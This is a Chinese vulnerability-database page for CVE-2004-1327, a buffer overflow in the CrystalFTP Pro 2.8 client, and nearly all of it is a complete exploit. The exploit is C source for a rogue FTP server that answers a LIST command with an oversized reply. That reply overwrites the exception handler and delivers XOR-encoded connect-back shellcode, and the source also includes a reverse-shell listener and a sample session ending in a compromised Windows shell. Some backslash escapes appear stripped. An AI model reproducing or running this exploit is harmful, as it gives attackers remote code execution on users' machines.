Crystal Art Crystal FTP远程客户端缓冲区溢出漏洞
| 漏洞ID | 1108700 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2005-04-24 | 更新时间 | 2005-10-20 |
![图片[1]-Crystal Art Crystal FTP远程客户端缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2004-1327 |
![图片[2]-Crystal Art Crystal FTP远程客户端缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200412-913 |
| 漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
CrystalFTP客户端2.8版本存在缓冲区溢出漏洞。远程恶意服务器可以借助对含有长拓展文件名LIST命令的回复来执行任意代码。
|漏洞EXP
/*
* CrystalFTP Pro v2.8 Buffer Overflow Exploit
*
* 04/25/2005
*
* despite the fact that nobody uses CrystalFTP
* i had to release a new version that replaces
* the first one.
*
* this overwrites the structured exception handler
* with a "pop edx pop eax ret" in kernel32.dll.
* this takes us to a pointer of the next SEH.
* just jmp over the SEH itself and reverse code
* gets executed.
*
* add more targets if needed
*
* have phun
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ / _ / ___/ __/ ___/ __ / __ / / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* ___/__, /_.___/___/_/ __/_/ ____/_/ /_/_/___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ local IP: 192.168.2.102
* --[ incomming connection from: 192.168.2.103
* --[ sending welcome message...done!
* --[ getting login information
* --[ reading USER...done!
* --[ reading PASS...done!
* USER LOGGED IN!
* --[ proceeding...
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ entering passive mode...
* --[ passive connection established!
* --[ reading cmd...done!
* --[ user is trying to use "LIST" command
* --[ w00d w00d, let`s kick his ass...
* --[ sending packet [ 711 bytes ]...done!
* --[ confirming...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.103
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:crystalFTP>
*
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
/*
*
* definitions
*
*/
#define RED "E[31mE[1m"
#define GREEN "E[32mE[1m"
#define YELLOW "E[33mE[1m"
#define BLUE "E[34mE[1m"
#define NORMAL "E[m"
#define PORT 21
#define PASV 31337
#define BACKLOG 5
/*
*
* prototypes
*
*/
int isip ( char* ip );
int shell ( int s, char* tip, unsigned short cbport );
char* get_cmd ( int s );
void auth ( int s );
void handle_cmd ( int s, int connfd, char* ip );
void header ();
void start_reverse_handler ();
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9"
"x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3"
"x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99xF1xEE"
"xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99"
"x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF"
"x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6"
"x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF"
"x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD"
"x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD"
"xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD"
"xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66"
"xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66"
"xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB"
"xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3"
"x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3"
"x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D"
"x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75"
"xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2"
"x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0";
unsigned char head[] =
"x2dx72x77x2dx72x2dx2dx72x2dx2dx20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x32x39x20x44x65x63x20x32"
"x32x20x31x33x3ax33x37x20x63x79x62x65x72x74x72x6f"
"x6ex69x63x2e";
char* argv3 = NULL;
/*
*
* functions
*
*/
int
isip ( char* ip )
{
unsigned int a, b, c, d;
sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d );
if ( a < 1 || a > 255 )
return ( 1 );
if ( b < 0 || b > 255 )
return ( 1 );
if ( c < 0 || c > 255 )
return ( 1 );
if ( d < 0 || d > 255 )
return ( 1 );
return ( 0 );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
usleep(10);
}
}
char*
get_cmd ( int s )
{
static char cmd[32];
printf ( "--[" YELLOW " reading cmd..." NORMAL );
if ( read ( s, cmd, 32 ) <= 0 )
{
printf ( RED "failed!n" NORMAL);
exit ( 1 );
}
printf ( GREEN "done!n" NORMAL );
return ( cmd );
}
void
auth ( int s )
{
char user[32], pass[32], out[128];
printf ( "--[ sending welcome message..." );
bzero ( &out, 128 );
strcpy ( out, "220 cybertronicFTP v0.2rn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!n" NORMAL );
printf ( "--[ getting login informationn" );
printf ( "--[" YELLOW " reading USER..." NORMAL );
sleep ( 1 );
if ( read ( s, user, 32 ) <= 0 )
{
printf ( RED "failed!n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "331 Anonymous FTP serverrn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
printf ( "--[" YELLOW " reading PASS..." NORMAL );
sleep ( 1 );
if ( read ( s, pass, 32 ) <= 0 )
{
printf ( RED "failedn" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "230 Login successful!rn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
printf ( GREEN "tUSER LOGGED IN!n" NORMAL );
printf ( "--[ proceeding...n" );
}
void
handle_cmd ( int s, int s2, char* ip )
{
int listenfd, connfd;
int i = 1;
int tmp[4];
unsigned long ret = 0x77ea5794; //edx eax ret in kernel32.dll
char* a = NULL;
char* cmd;
char out[128], buffer[1024], addr[32];
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
while ( 1 )
{
cmd = get_cmd ( s );
if ( strncmp ( cmd, "PWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 "/" is current directory.rn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 "/" is current directory.rn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "200 Type set to A..rn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
{
bzero ( &addr, 32 );
a = ( char* ) strtok ( ip, "." );
tmp[0] = ( int ) a;
while ( a != NULL )
{
a = ( char* ) strtok ( NULL, "." );
tmp[i] = ( int )a;
i++;
}
bzero ( &out, 128 );
sprintf( out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).rn", tmp[0], tmp[1], tmp[2], tmp[3] );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
printf ( "--[ entering passive mode...n" );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PASV );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, 1 ) == -1 )
{
printf ( RED "listen failed!n" NORMAL );
exit ( 1 );
}
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!n" NORMAL );
exit ( 1 );
}
close ( listenfd );
printf ( "--[" GREEN " passive connection established!n" NORMAL );
handle_cmd ( s, connfd, addr );
}
else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
{
printf ( "--[" GREEN " user is trying to use "LIST" commandn" NORMAL );
printf ( "--[ w00d w00d, let`s kick his ass...n" );
bzero ( &buffer, 1024 );
memcpy ( buffer, head, sizeof ( head ) - 1 );
memset ( buffer + 68, 0x90, 255 );
memcpy ( buffer + 321, "xebx46", 2 );
strncat ( buffer, ( unsigned char * ) &ret, 4 );
memset ( buffer + 327, 0x90, 66 );
memcpy ( buffer + 393, reverseshell, sizeof ( reverseshell ) - 1 );
strcat ( buffer, "rn" );
bzero ( &out, 128 );
strcpy ( out, "150 Here comes the directory listing.rn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
printf ( "--[ sending packet [ %d bytes ]...", strlen ( buffer ) );
if ( write ( s2, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!n" NORMAL);
bzero ( &out, 128 );
strcpy ( out, "226 Transfer okrn" );
printf ( "--[ confirming..." );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!n" NORMAL);
close ( s2 );
start_reverse_handler ( argv3 );
}
else
{
bzero ( &out, 128 );
strcpy ( out, "550 command not supportedrn" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "twrite failed!n" NORMAL );
exit ( 1 );
}
}
}
}
void
header ()
{
printf ( " __ __ _ n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ n" );
printf ( " / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/ n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ n" );
printf ( "\___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/ n" );
printf ( " /____/ nn" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]netn" );
}
void
start_reverse_handler ()
{
int s1, s2;
unsigned short cbport;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
sscanf ( argv3, "%u", &cbport );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!n" );
exit ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[" GREEN " incomming connection from:t" YELLOW " %sn" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
unsigned long xoredip;
unsigned short xoredcbport;
char* ip;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
if ( argc != 3 )
{
printf ( RED "--[ usage: %s <connectback ip> <connectback port>n" NORMAL, argv[0] );
exit ( 1 );
}
if ( isip ( argv[1] ) != 0 )
{
printf ( RED "--[ enter a valid IPn" NORMAL );
exit ( 1 );
}
system ( "clear" );
header ();
argv3 = argv[2];
xoredip = inet_addr ( argv[1] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[2] ) ) ^ ( unsigned short ) 0x9999;
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "listen failed!n" NORMAL );
exit ( 1 );
}
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!n" NORMAL );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
ip = ( char* ) ( argv[1] );
printf ( "--[ local IP: %sn", ip );
printf ( "--[" GREEN " incomming connection from:t" YELLOW " %sn" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
auth ( connfd );
handle_cmd ( connfd, ( int ) NULL, ip );
}
close ( connfd );
}
}
// milw0rm.com [2005-04-24]
|参考资料
来源:XF
名称:crystal-ftp-list-bo(18594)
链接:http://xforce.iss.net/xforce/xfdb/18594
来源:BID
名称:12038
链接:http://www.securityfocus.com/bid/12038
来源:SECUNIA
名称:13583
链接:http://secunia.com/advisories/13583/
来源:BUGTRAQ
名称:20041220CrystalFTPProClientBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110356203624337&w;=2
相关推荐: Oracle 9i/10g Database Fine Grained Audit Logging Failure Vulnerability
Oracle 9i/10g Database Fine Grained Audit Logging Failure Vulnerability 漏洞ID 1096717 漏洞类型 Failure to Handle Exceptional Conditions…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666